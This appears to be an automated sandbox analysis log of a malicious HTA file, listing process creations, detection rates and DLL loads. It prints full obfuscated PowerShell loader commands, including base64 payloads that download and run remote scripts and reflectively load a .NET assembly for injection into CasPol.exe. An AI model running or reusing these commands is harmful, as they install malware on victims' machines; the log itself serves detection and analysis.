Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaVirustotal: Detection: 27%
                      Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaReversingLabs: Detection: 13%
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = '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';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'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'+[chAr]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: wininet.dll
